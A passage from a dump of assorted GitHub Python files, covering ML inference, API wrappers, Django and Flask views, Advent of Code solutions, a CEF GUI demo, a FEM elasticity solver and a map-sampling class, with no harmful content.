and 1.\n \"\"\"\n metadata = pd.read_csv(os.path.join(prep_test_path, 'metadata.csv'), index_col=[0])\n test_ids = metadata.index\n test_ids_orig = metadata['id'].values\n\n ds = DatasetTest(prep_test_path, modalities=modalities, features=features)\n\n id_rle_dict = {}\n\n for _id in tqdm(test_ids):\n x = ds.load_x(_id)\n\n # TODO: add not DL method of prediction\n\n # *** DL methods ***\n with torch.no_grad():\n model = model.cuda()\n model.eval()\n\n pred = model(to_var(np.array([x], dtype='float32'), requires_grad=False))\n # TODO: add sequence of models\n pred = to_np(pred)[0]\n\n # TODO: add postprocessing\n\n # converting to 2-dim numpy array (image-like) of original shape (101x101)\n # then to binary predictions\n if len(pred.shape) == 3:\n pred = pred[0]\n\n ORIG_SIZE = 101\n if pred.shape[-1] != ORIG_SIZE:\n pred = resize(pred, output_shape=(ORIG_SIZE, ORIG_SIZE), order=3, preserve_range=True)\n\n pred = pred > threshold\n\n # *** Encoding binarized predictions ***\n rle_pred = rl_enc(pred)\n id_rle_dict[test_ids_orig[_id]] = rle_pred\n\n # end for\n\n # *** Saving submission csv-file ***\n csv_to_save = pd.DataFrame.from_dict(id_rle_dict, orient='index')\n\n csv_to_save.index.names = ['id']\n csv_to_save.columns = ['rle_mask']\n\n csv_to_save.to_csv(os.path.join(prep_test_path, csv_filename))\n","repo_name":"BorisShirokikh/salt-challenge","sub_path":"saltsegm/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3469635943","text":"import requests\n\nfrom ... import errors\nfrom . import decorators\n\n\nURL = 'https://cloud-api.yandex.net/v1/disk/'\n\n\n_errors_mapping = {\n 400: errors.BadData,\n 403: errors.Forbidden,\n 404: errors.NotFound,\n 409: errors.Conflict,\n}\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef get(url, params=None, **kwargs):\n response = requests.get(URL + url, params=params, **kwargs)\n _handle_responses(response)\n return response.json()\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef put(url, params=None, absolute_url=False, **kwargs):\n request_url = url if absolute_url else URL + url\n response = requests.put(request_url, data=params, **kwargs)\n _handle_responses(response)\n return response.json() if response.text != '' else None\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef post(url, params=None, json=None, **kwargs):\n return requests.post(\n URL + url,\n data=params,\n json=json,\n **kwargs\n )\n\n\n@decorators.ya_request_params\n@decorators.wrap_errors\ndef delete(url, **kwargs):\n return requests.delete(URL + url, **kwargs)\n\n\ndef _handle_responses(response):\n if response.status_code < 300:\n return\n error_text = '{}: {}'.format(\n response.reason,\n response.text,\n )\n if response.status_code >= 500:\n raise errors.InteranalYaDError(error_text)\n if response.status_code in _errors_mapping:\n raise _errors_mapping[response.status_code](error_text)\n","repo_name":"freylis/yadbu","sub_path":"yadbu/api_client/requester/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71606062878","text":"from django.shortcuts import render\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\n\n\n\n@login_required(login_url='/')\ndef home(request):\n return render(request, 
'home.html')\n\n@login_required(login_url='/')\ndef search(request):\n    if request.method == 'GET':\n        search_value = request.GET.get('search')\n        if search_value.isnumeric():\n            try:\n                search_data = Member.objects.filter(national_id_number__contains=search_value)\n                context = {'search_data': search_data}\n                return render(request, 'search_data.html', context)\n            except:\n                context = {'search_data': ''}\n                return render(request, 'search_data.html', context)\n        else:\n            try:\n                search_data = Member.objects.filter(name__contains=search_value)\n                context = {'search_data': search_data}\n                return render(request, 'search_data.html', context)\n            except:\n                context = {'search_data': ''}\n                return render(request, 'search_data.html', context)\n    return render(request, 'search_data.html')\n\n@login_required(login_url='/')\ndef profile_details(request, id):\n    member = Member.objects.get(id=id)\n    if member.father:\n        father = Member.objects.get(id=member.father.id)\n    else:\n        father = None\n    if member.mother:\n        mother = Member.objects.get(id=member.mother.id)\n    else:\n        mother = None\n    if father and mother:\n        sibling = Member.objects.filter(father=father, mother=mother)\n    elif father:\n        sibling = Member.objects.filter(father=father)\n    elif mother:\n        sibling = Member.objects.filter(mother=mother)\n    else:\n        sibling = None\n\n    chilrens = member.children_of_father.all()\n    wife = member.wives.all()\n    context = {\n        'member': member,\n        'father': father,\n        'mother': mother,\n        'sibling': sibling,\n        'wife': wife,\n        'chilrens': chilrens\n    }\n    return render(request, 'profile_details.html', context)\n\n\ndef dashboard(request):\n    return render(request, 'dashboard.html')\n\n@login_required(login_url='/')\ndef blood_doner(request):\n    members = Member.objects.filter(\n        want_to_donate_blood=True)\n\n    b_group = request.GET.get('blood_group')\n    if b_group:\n        members = members.filter(\n            blood_group__name_of_group=b_group)\n\n    dist_name = request.GET.get('area')\n    if dist_name:\n        members = members.filter(\n            district__name=dist_name)\n\n    blood_groups = BloodGroup.objects.all()\n    districts = District.objects.all()\n\n    context = {\n        'blood_groups': blood_groups,\n        'districts': districts,\n        'members': members,\n    }\n\n    return render(request, 'blood_doner.html', context)\n\nimport datetime\n@login_required(login_url='/')\ndef marriagable_list(request):\n    compare_date = datetime.datetime.now() - datetime.timedelta(days=25*365)\n    member = Member.objects.filter(date_of_birth__lte=compare_date, marital_status=\"S\")\n    context = {'member': member}\n    return render(request, 'marriagable_list.html', context)\n\n\n@login_required(login_url='/')\ndef important_number(request):\n    numbers = ImportantNumber.objects.all()\n    context = {'numbers': numbers}\n    return render(request, 'important_number.html', context)\n\n\n@login_required(login_url='/')\ndef prayer_place(request, place):\n    p_place = PrayerPlace.objects.filter(place_type=place)\n    context = {'p_place': p_place, 'place': place}\n    return render(request, 'prayer_place.html', context)\n\n\n@login_required(login_url='/')\ndef institution(request, name):\n    all_institution = Institution.objects.filter(institute_type=name)\n    context = {'all_institution': all_institution, 'name': name}\n    return render(request, 'institution.html', context)\n\nfrom familydataapp.forms import *\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect\n\n\ndef user_login(request):\n    if request.method == 'POST':\n        username = request.POST['username']\n        password = request.POST['password']\n        user = authenticate(request, username=username, password=password)\n        if user:\n            login(request, user)\n            return redirect('/home')\n        else:\n            msg = \"Invalid username or password\"\n            context = {'msg': msg}\n            return render(request, 'login.html', context)\n    return render(request, 'login.html')\n\ndef user_logout(request):\n    logout(request)\n    return redirect('/')\n\n@login_required(login_url='/')\ndef crime_point(request):\n    all_places = CrimePlace.objects.all()\n    context = {'all_places': all_places}\n    return render(request, 'crime_point.html', context)\n\n@login_required(login_url='/')\ndef crime_team(request, id):\n    place = CrimePlace.objects.get(id=id)\n    teams = CrimeTeam.objects.filter(crime_location=place)\n    context = {'teams': teams}\n    return render(request, 'crime_team.html', context)\n\n@login_required(login_url='/')\ndef criminals(request):\n    all_criminals = Member.objects.filter(is_criminal=True)\n    context = {'all_criminals': all_criminals}\n    return render(request, 'criminals.html', context)","repo_name":"alhasib/familydataproject","sub_path":"familydataapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
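A note on the familydataproject record above: its blood_doner view relies on Django QuerySets being lazy, so each optional GET parameter simply stacks another filter onto the same query, and the database is hit only once the template iterates the result. A minimal sketch of that pattern, assuming the Member model and the field names used in the view (not verified against the app's models):

from django.shortcuts import render

def donors(request):
    # Base queryset; no SQL is executed yet.
    members = Member.objects.filter(want_to_donate_blood=True)
    # Each parameter that is present adds one more WHERE clause to the same query.
    b_group = request.GET.get('blood_group')
    if b_group:
        members = members.filter(blood_group__name_of_group=b_group)
    area = request.GET.get('area')
    if area:
        members = members.filter(district__name=area)
    # The single query runs when the template iterates 'members'.
    return render(request, 'blood_doner.html', {'members': members})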
+{"seq_id":"43189051481","text":"import inspect\nimport logging\n\nfrom aiohttp import web\n\nfrom app.user.models import User\n\nlogger = logging.getLogger('app')\n\n\nasync def add_user(request: web.Request) -> User:\n async with request.app['db'].acquire() as connection:\n result = await connection.fetch(\n '''\n INSERT INTO public.\"user\" (name)\n VALUES ($1)\n returning *;\n ''',\n request['user'].get('user_name')\n )\n logger.info('Add user () in DB',\n extra={'route': request.path_qs,\n 'functionName': inspect.getframeinfo(inspect.currentframe()).function})\n return User(**result[0])\n\n\nasync def get_user(request: web.Request) -> User:\n async with request.app['db'].acquire() as connection:\n result = await connection.fetch(\n '''\n SELECT * \n FROM public.\"user\"\n WHERE id = $1;\n ''',\n request['user'].get('user_id')\n )\n logger.info('Get user () for DB',\n extra={'route': request.path_qs,\n 'functionName': inspect.getframeinfo(inspect.currentframe()).function})\n\n # request['user'].update({'user_model': User(**result[0])})\n if result:\n return User(**result[0])\n","repo_name":"Mesheryakof/neuron","sub_path":"app/user/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35678821571","text":"import sys\n\n\nlines = (l.strip() for l in sys.stdin)\nx, a, d = 0, 0, 0\n\ndef move(v):\n global x, a, d\n x += v\n d += (a * v)\n\ndef incr_a(v):\n global a\n a += v\n\nfn_map = {\n \"forward\": lambda v: move(int(v)),\n \"down\": lambda v: incr_a(int(v)),\n \"up\": lambda v: incr_a(-int(v)),\n}\nfor l in lines:\n command, v = l.split(\" \")\n fn_map[command](v)\n\nprint(\"{}, {}\".format(x, d))\n","repo_name":"calebwang/adventofcode","sub_path":"day2/solve2.py","file_name":"solve2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"75131191199","text":"# task1 \n\ndef task1(start_nums,num_steps):\n '''\n Find the spoken number at the step num_steps given the starting numbers\n\n Inputs:\n start_nums (list): a list of integers\n num_steps (int): the maximum step\n \n Returns (int): the last spoken number\n '''\n # Dictionary maps each number to a tuple of the last 2 times it was spoken\n nums = {}\n # Initialize the starting numbers\n for idx, n in enumerate(start_nums):\n nums[n] = (idx + 1, None)\n last_num = start_nums[-1]\n start_turn = len(start_nums) + 1\n\n for turn in range(start_turn, num_steps + 1):\n last1, last2 = nums.get(last_num, (None, None))\n if last2 is None:\n last_num = 0\n else:\n last_num = last1 - last2\n last1, _ = nums.get(last_num, (None, None))\n nums[last_num] = (turn, last1)\n return last_num","repo_name":"kameelkhabaz/uchicago_classes","sub_path":"cmsc12100/short-exercises-kameelkhabaz/practice2020_day15.py","file_name":"practice2020_day15.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30957586555","text":"\"\"\"Advent of Code 2019 Day 7.\"\"\"\n\n\ndef main(file_input='input.txt'):\n intcodes = [\n int(num)\n for num in get_file_contents(file_input)[0].strip().split(',')]\n highest_signal = find_highest_signal(intcodes[:], {0, 1, 2, 3, 4}, signal)\n print(f'Highest signal: {highest_signal}')\n highest_signal_with_feedback = find_highest_signal(\n intcodes[:], {9, 8, 7, 6, 5}, with_feedback_loop)\n 
print(f'Highest signal with feedback loop: {highest_signal_with_feedback}')\n\n\ndef find_highest_signal(intcodes, phase_set, signal_func):\n \"\"\"Find highest signal from program, using signal_func and phase_set.\"\"\"\n combinations = get_combinations(phase_set, [])\n highest_signal = float('-inf')\n for combination in combinations:\n state = {\n 'input': combination,\n 'output': [0],\n }\n output_signal = signal_func(state, intcodes, combination)\n highest_signal = max(highest_signal, output_signal)\n return highest_signal\n\n\ndef with_feedback_loop(state, intcodes, combination):\n \"\"\"Find signal send from program after using feedback loop.\"\"\"\n programs = []\n for _ in range(5):\n state = get_state(combination.pop(0))\n programs.append((intcodes[:], state))\n programs[0][1]['initial'].append(0)\n connect_amplifers(programs)\n while all('finished' not in program[1] for program in programs):\n for program, state in programs:\n if 'finished' in state:\n continue\n program, state = process_program(program, state)\n return programs[4][1]['output'][0]\n\n\ndef signal(state, intcodes, combination):\n \"\"\"Find signal send from program after processing intcodes on state.\"\"\"\n for initial in combination:\n state = get_state(initial, state['output'][0])\n final_program, state = process_program(intcodes[:], state)\n return state['output'][0]\n\n\ndef connect_amplifers(programs):\n \"\"\"Connect amplifiers by connecting output to the input of next one.\"\"\"\n for program_no, (_, state) in enumerate(programs[1:]):\n state['input'] = programs[program_no][1]['output']\n programs[4][1]['output'] = programs[0][1]['input']\n\n\ndef get_state(initial, input_value=None):\n \"\"\"Get new state, filling initial and optional input_value.\"\"\"\n return {\n 'last_position': None,\n 'initial': [initial],\n 'input': [input_value] if input_value is not None else [],\n 'output': [],\n }\n\n\ndef get_combinations(numbers_left, cur_combination):\n \"\"\"Get combinations from numbers_left.\"\"\"\n if not numbers_left:\n return [cur_combination]\n combinations = []\n for number in numbers_left:\n combinations.extend(get_combinations(\n numbers_left - {number},\n cur_combination + [number]\n ))\n return combinations\n\n\ndef process_program(program, state):\n \"\"\"Process program.\"\"\"\n position = state['last_position'] if state['last_position'] else 0\n while position < len(program):\n state['last_position'] = position\n start = position\n instruction = program[start]\n modes, opcode = parse_instruction(instruction)\n if not opcode:\n break\n parameters, opfunc = get_operation(opcode)\n if opfunc is None:\n state['finished'] = True\n break\n\n end = start + parameters + 1\n func_parameters = program[start + 1:end]\n\n increment, result = opfunc(program, state, func_parameters, modes)\n if increment:\n position += result + 1\n else:\n position = result\n return program, state\n\n\ndef parse_instruction(instruction):\n \"\"\"Parse instruction to modes and opcode.\"\"\"\n opcode = instruction % 100\n result_modes = []\n modes = instruction // 100\n for _ in range(3):\n result_modes.append(modes % 10)\n modes = modes // 10\n return result_modes, opcode\n\n\ndef get_operation(opcode):\n \"\"\"Opcode to operation function mapping.\"\"\"\n opcodes = {\n 1: (3, add_op),\n 2: (3, mult_op),\n 3: (1, input_op),\n 4: (1, output_op),\n 5: (2, jump_if_true),\n 6: (2, jump_if_false),\n 7: (3, less_than),\n 8: (3, equals),\n 99: (0, None),\n }\n return opcodes.get(opcode)\n\n\ndef add_op(program, _, parameters, 
modes):\n \"\"\"Addition operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n program[target] = val1 + val2\n return True, 3\n\n\ndef mult_op(program, _, parameters, modes):\n \"\"\"Multiplication operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n program[target] = val1 * val2\n return True, 3\n\n\ndef input_op(program, state, parameters, modes):\n \"\"\"Input operation.\"\"\"\n target = parameters[0]\n if state['initial']:\n program[target] = state['initial'].pop(0)\n else:\n try:\n program[target] = state['input'].pop(0)\n except IndexError:\n return True, 9999\n return True, 1\n\n\ndef output_op(program, state, parameters, modes):\n \"\"\"Output operation.\"\"\"\n value = program[parameters[0]] if modes[0] == 0 else parameters[0]\n state['output'].append(value)\n return True, 1\n\n\ndef jump_if_true(program, _, parameters, modes):\n \"\"\"Jump if true operation.\"\"\"\n val1, val2 = get_operation_values(program, parameters, modes)\n if val1 != 0:\n return False, val2\n return True, 2\n\n\ndef jump_if_false(program, _, parameters, modes):\n \"\"\"Jump if false operation.\"\"\"\n val1, val2 = get_operation_values(program, parameters, modes)\n if val1 == 0:\n return False, val2\n return True, 2\n\n\ndef less_than(program, _, parameters, modes):\n \"\"\"Less than operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n if val1 < val2:\n program[target] = 1\n else:\n program[target] = 0\n return True, 3\n\n\ndef equals(program, _, parameters, modes):\n \"\"\"Equal operation.\"\"\"\n *params, target = parameters\n val1, val2 = get_operation_values(program, params, modes)\n if val1 == val2:\n program[target] = 1\n else:\n program[target] = 0\n return True, 3\n\n\ndef get_operation_values(program, parameters, modes):\n \"\"\"Get values from program, based on parameters and modes.\"\"\"\n val1, val2 = [\n program[param] if mode == 0 else param\n for param, mode in zip(parameters, modes)\n ]\n return val1, val2\n\n\ndef get_file_contents(file):\n \"\"\"Read all lines from file.\"\"\"\n with open(file) as f:\n return f.readlines()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gikf/advent-of-code","sub_path":"advent-of-code-2019/day 7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"39341732819","text":"# -*- coding: utf-8 -*-\n# @Time : 2020-04-05\n# @Author : Virace\n\nfrom cefpython3 import cefpython as cef\n\nimport math\nimport os\nimport sys\n\nimport win32api\nimport win32con\nimport win32gui\n\nDEFAUTL_URL = 'https://api.virace.cc/jgah/cef/'\nDEFAULT_USERNAME = 'root'\nDEFAULT_PASSWORD = 'root'\nDEFAULT_WINDOW_TITLE = '处女座之最 - 演示程序'\n\n# Globals\nWindowUtils = cef.WindowUtils()\n# 全局窗口句柄\ng_windows_handle = None\n# 多线程\ng_multi_threaded = False\n\n\nclass BindFunction:\n @staticmethod\n def get_title(callback):\n callback.Call(DEFAULT_WINDOW_TITLE)\n\n @staticmethod\n def login(data, callback):\n if 'username' not in data or 'password' not in data:\n callback.Call(False, '提交格式不正确')\n elif data['username'] == '' or data['password'] == '':\n callback.Call(False, '用户名密码不能为空')\n elif data['username'] == DEFAULT_USERNAME and data['password'] == DEFAULT_PASSWORD:\n callback.Call(True)\n else:\n callback.Call(False, '用户名或密码错误.')\n\n @staticmethod\n def min():\n 
win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MINIMIZE)\n\n    @staticmethod\n    def max():\n        # Check the current window state\n        if win32gui.GetWindowPlacement(g_windows_handle)[1] == win32con.SW_SHOWMAXIMIZED:\n            win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_RESTORE)\n        else:\n            win32gui.PostMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MAXIMIZE)\n\n    @staticmethod\n    def close():\n        win32gui.PostMessage(g_windows_handle, win32con.WM_CLOSE)\n\n    @staticmethod\n    def move():\n        # Release the mouse capture\n        win32gui.ReleaseCapture()\n        # Move the window\n        win32gui.SendMessage(g_windows_handle, win32con.WM_SYSCOMMAND, win32con.SC_MOVE + win32con.HTCAPTION, 0)\n\n\ndef main():\n    sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error\n\n    settings = {\n        \"multi_threaded_message_loop\": g_multi_threaded,\n    }\n    cef.Initialize(settings=settings)\n\n    window_proc = {\n        win32con.WM_CLOSE: close_window,\n        win32con.WM_DESTROY: exit_app,\n        win32con.WM_SIZE: WindowUtils.OnSize,\n        win32con.WM_SETFOCUS: WindowUtils.OnSetFocus,\n        win32con.WM_ERASEBKGND: WindowUtils.OnEraseBackground\n    }\n    global g_windows_handle\n    g_windows_handle = create_window(title=DEFAULT_WINDOW_TITLE,\n                                     class_name=DEFAULT_WINDOW_TITLE,\n                                     width=1100,\n                                     height=730,\n                                     window_proc=window_proc,\n                                     icon=\"resources/chromium.ico\")\n\n    window_info = cef.WindowInfo()\n    window_info.SetAsChild(g_windows_handle)\n\n    if g_multi_threaded:\n        # When using a multi-threaded message loop, CEF's UI thread\n        # is no longer the application's main thread. In that case the\n        # browser must be created with cef.PostTask and the CEF message\n        # loop must not be run explicitly.\n        cef.PostTask(cef.TID_UI,\n                     create_browser,\n                     window_info,\n                     {},\n                     DEFAUTL_URL)\n        win32gui.PumpMessages()\n\n    else:\n        create_browser(window_info=window_info,\n                       settings={},\n                       url=DEFAUTL_URL)\n        cef.MessageLoop()\n\n    cef.Shutdown()\n\n\ndef create_browser(window_info, settings, url):\n    assert (cef.IsThread(cef.TID_UI))\n    bind_js(cef.CreateBrowserSync(window_info=window_info,\n                                  settings=settings,\n                                  url=url))\n\n\ndef bind_js(browser):\n    \"\"\"\n    Bind the Python functions to JS; this could also be done with a LoadHandler.\n    :param browser:\n    :return:\n    \"\"\"\n    bindings = cef.JavascriptBindings()\n    bindings.SetFunction(\"py_title\", BindFunction.get_title)\n    bindings.SetFunction(\"py_login\", BindFunction.login)\n    bindings.SetFunction(\"py_move\", BindFunction.move)\n    bindings.SetFunction(\"py_windows_min\", BindFunction.min)\n    bindings.SetFunction(\"py_windows_max\", BindFunction.max)\n    bindings.SetFunction(\"py_windows_close\", BindFunction.close)\n    browser.SetJavascriptBindings(bindings)\n\n\ndef create_window(title, class_name, width, height, window_proc, icon):\n    # Register window class\n    wndclass = win32gui.WNDCLASS()\n    wndclass.hInstance = win32api.GetModuleHandle(None)\n    wndclass.lpszClassName = class_name\n    wndclass.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW\n    wndclass.hbrBackground = win32con.COLOR_WINDOW\n    wndclass.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)\n    wndclass.lpfnWndProc = window_proc\n    atom_class = win32gui.RegisterClass(wndclass)\n    assert (atom_class != 0)\n\n    # Center window on screen.\n    screenx = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)\n    screeny = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)\n    xpos = int(math.floor((screenx - width) / 2))\n    ypos = int(math.floor((screeny - height) / 2))\n    if xpos < 0:\n        xpos = 0\n    if ypos < 0:\n        ypos = 0\n\n    # Create window\n    window_style = (win32con.WS_POPUP | win32con.WS_CLIPCHILDREN\n                    | win32con.WS_VISIBLE)\n    window_handle = 
win32gui.CreateWindow(class_name, title, window_style,\n xpos, ypos, width, height,\n 0, 0, wndclass.hInstance, None)\n assert (window_handle != 0)\n\n # Window icon\n icon = os.path.abspath(icon)\n if not os.path.isfile(icon):\n icon = None\n if icon:\n # Load small and big icon.\n # WNDCLASSEX (along with hIconSm) is not supported by pywin32,\n # we need to use WM_SETICON message after window creation.\n # Ref:\n # 1. http://stackoverflow.com/questions/2234988\n # 2. http://blog.barthe.ph/2009/07/17/wmseticon/\n bigx = win32api.GetSystemMetrics(win32con.SM_CXICON)\n bigy = win32api.GetSystemMetrics(win32con.SM_CYICON)\n big_icon = win32gui.LoadImage(0, icon, win32con.IMAGE_ICON,\n bigx, bigy,\n win32con.LR_LOADFROMFILE)\n smallx = win32api.GetSystemMetrics(win32con.SM_CXSMICON)\n smally = win32api.GetSystemMetrics(win32con.SM_CYSMICON)\n small_icon = win32gui.LoadImage(0, icon, win32con.IMAGE_ICON,\n smallx, smally,\n win32con.LR_LOADFROMFILE)\n win32api.SendMessage(window_handle, win32con.WM_SETICON,\n win32con.ICON_BIG, big_icon)\n win32api.SendMessage(window_handle, win32con.WM_SETICON,\n win32con.ICON_SMALL, small_icon)\n\n return window_handle\n\n\ndef close_window(window_handle, message, wparam, lparam):\n browser = cef.GetBrowserByWindowHandle(window_handle)\n browser.CloseBrowser(True)\n # OFF: win32gui.DestroyWindow(window_handle)\n return win32gui.DefWindowProc(window_handle, message, wparam, lparam)\n\n\ndef exit_app(*_):\n win32gui.PostQuitMessage(0)\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Virace/python-jgah","sub_path":"Main/2154/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"30551512179","text":"from collections import deque\r\n\r\ndir = [(0,1),(0,-1),(-1,0),(1,0)]\r\n\r\ndef bfs(r,c):\r\n cnt = 0\r\n q = deque()\r\n q.append((r,c))\r\n while q:\r\n r,c = q.popleft()\r\n for k in range(4):\r\n nr = r + dir[k][0]\r\n nc = c + dir[k][1]\r\n if 0<=nr Index spletna stran, zdravo {up_ime} \"\n\n@app.route(\"/about\", methods=[\"GET\"])\ndef on_about():\n return render_template(\"about.html\")\n\n@app.route(\"/about\", methods=[\"POST\"])\ndef on_about_post():\n ime = request.form.get(\"vnos-imena\")\n geslo = request.form.get(\"psw\")\n response = make_response (\n render_template(\"about_replay.html\", ime=ime, geslo=geslo)\n )\n response.set_cookie(\"uporabnisko_ime\", ime)\n return response\n\n@app.route(\"/logout\")\ndef logout():\n response = make_response(\"logout\")\n response.set_cookie(\"uporabnisko_ime\", \"\", expires=0)\n return response\n \nif __name__ == \"__main__\":\n app.run()","repo_name":"Kodermatic/SN---17_WEBapp2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28042783135","text":"import serial\nimport time\n\nport = '/dev/ttyUSB0'\nser = serial.Serial(port,9600)\n\nwhile True:\n \n f=open(\"/home/pi/rpi-lora-tranceiver-master/dragino_lora_app/tfdata.txt\",'r')\n data = f.read()\n f.close()\n #led = raw_input(\" 'A-K' , 'z' : \") \n ser.write(data)\n # if led == \"e\" :\n # print(\"program End\")\n # break","repo_name":"whydizzy27/2019NetChallenge","sub_path":"LoraModule_Wireless_Communication/Server 
1/sr.py","file_name":"sr.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11069109169","text":"__author__ = 'Nasser'\n\nimport numpy as np\nfrom scipy.sparse.linalg import spsolve\nfrom scipy import sparse\nimport matplotlib.pyplot as plt\nimport gmsh\nimport element2dof\nimport assemble2dof\nimport plotter\nimport boundaryconditions2dof\nimport processing\n\ndef solver(meshName, material, body_forces, traction_imposed,\n displacement_imposed,\n plotUndeformed, plotStress, plotDeformed):\n\n\n mesh = gmsh.parse(meshName)\n\n ele = element2dof.Matrices(mesh)\n\n s = mesh.surfaces\n matDic = {s[i]: material[j] for i, j in enumerate(material)}\n\n ele.stiffness(matDic)\n\n ele.body_forces(body_forces)\n\n K = assemble2dof.globalMatrix(ele.K, mesh)\n\n P0q = assemble2dof.globalVector(ele.P0q, mesh)\n\n P0t = boundaryconditions2dof.neumann(mesh, traction_imposed)\n\n P0 = P0q + P0t\n\n Km, P0m = boundaryconditions2dof.dirichlet(K, P0, mesh,displacement_imposed)\n\n Ks = sparse.csc_matrix(Km)\n\n U = spsolve(Ks, P0m)\n\n ele.nodal_forces(U)\n Pnode = assemble2dof.globalVector(ele.pEle, mesh)\n\n sNode, sEle, eEle = processing.stress_recovery_simple(mesh, U, material)\n\n principal_max = processing.principal_stress_max(sNode[0], sNode[1], sNode[2])\n principal_min= processing.principal_stress_min(sNode[0], sNode[1], sNode[2])\n\n dpi = 90\n magf = plotDeformed['DeformationMagf']\n\n #PLOTTER CONTOUR MAPS\n if plotStress['s11'] == True:\n plotter.tricontourf(sNode[0]/10**3, mesh,\n 'Stress 11 (kPa)','spring', dpi)\n\n if plotStress['s22'] == True:\n plotter.tricontourf(sNode[1]/10**3, mesh,\n 'Stress 22 (kPa)','cool', dpi)\n\n if plotStress['s12'] == True:\n plotter.tricontourf(sNode[2]/10**3, mesh,\n 'Stress 12 (kPa)','hsv', dpi)\n\n if plotStress['sPmax'] == True:\n plotter.tricontourf(principal_max/10**3, mesh,\n 'Stress Principal Max (kPa)','autumn', dpi)\n\n if plotStress['sPmin'] == True:\n plotter.tricontourf(principal_min/10**3, mesh,\n 'Stress Principal min (kPa)','winter', dpi)\n\n #PLOTTER DRAW UNDEFORMED SHAPE, ELEMENTS, LABELS, BC\n if plotUndeformed['Domain'] == True:\n plotter.draw_domain(mesh, 'Case Study', dpi, 'k')\n\n if plotUndeformed['Elements'] == True:\n plotter.draw_elements(mesh, 'Case Study', dpi, 'k')\n\n if plotUndeformed['ElementLabel'] == True:\n plotter.draw_elements_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['EdgesLabel'] == True:\n plotter.draw_edges_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['NodeLabel'] == True:\n plotter.draw_nodes_label(mesh, 'Case Study',dpi)\n\n if plotUndeformed['SurfaceLabel'] == True:\n plotter.draw_surface_label(mesh, 'Case Study', dpi)\n\n #PLOTTER DEFORMED SHAPE\n if plotDeformed['DomainUndeformed'] == True:\n plotter.draw_domain(mesh, 'Deformed Shape', dpi, 'SteelBlue')\n\n if plotDeformed['ElementsUndeformed'] == True:\n plotter.draw_elements(mesh, 'Deformed Shape', dpi, 'SteelBlue')\n\n if plotDeformed['DomainDeformed'] == True:\n plotter.draw_deformed_domain(mesh, U, 'Deformed Shape', dpi, magf, 'Tomato')\n\n if plotDeformed['ElementsDeformed'] == True:\n plotter.draw_deformed_elements(mesh, U, 'Deformed Shape', dpi, magf,\n 'Tomato', 1)\n\n plt.show()\n","repo_name":"nasseralkmim/elfLAB","sub_path":"elasticity2d.py","file_name":"elasticity2d.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 
+{"seq_id":"13464489605","text":"\"\"\"\nModule with class SampleShape for sampling polygon maps with a regular \ngrid.\n\"\"\"\nimport numpy as np\nfrom pandas import Series, DataFrame\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\n\nclass SamplePolygonMap:\n \"\"\"Sample polygon map at grid points.\n\n Properties\n ----------\n gridpoints\n GeoDataFrame with gridpoints.\n sample\n GeoDataFrame with sampled values at gridpoints.\n bbox\n Grid boundaries as (xmin,ymin,xmax,ymax).\n\n Methods\n -------\n plot_sample\n Plot map of sample points.\n\n \"\"\"\n\n XMIN = 0\n XMAX = 280000\n YMIN = 300000\n YMAX = 620000\n STEP = 100\n CRS = 'epsg:28992' # Dutch RD grid\n\n def __init__(self,polygonmap,bbox=None,gridtype='regular',\n step=100,grid=None,crs='epsg:28992',):\n \"\"\"\n Parameters\n ----------\n polygonmap : geopandas.GeoDataFrame\n Polygon map as input to sample.\n bbox : numpy array, list or tuple, optional.\n Grid limits as (xmin,ymin,xmax,ymax).\n 